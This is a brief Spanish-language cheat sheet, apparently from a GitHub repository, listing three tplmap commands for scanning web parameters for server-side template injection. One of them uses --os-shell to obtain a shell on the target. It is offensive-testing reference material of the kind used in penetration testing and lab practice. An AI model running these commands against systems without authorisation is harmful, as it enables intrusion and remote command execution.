Skip to content

Latest commit

 

History

History

tplmap

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

Tplmap Cheat Sheet

Escaneo de vulnerabilidad SSTI a un parametro POST llamado 'name':

tplmap -u 'http://<TARGET>' -d name=test

Escaneo de vulnerabilidad SSTI a un parametro POST llamado 'name' y que nos de una shell:

tplmap -u 'http://<TARGET>' -d name=test --os-shell

Escaneo de vulnerabilidad SSTI en un request GET:

tplmap -u 'http://<TARGET>/execute?cmd=test'

⬅️ Regresar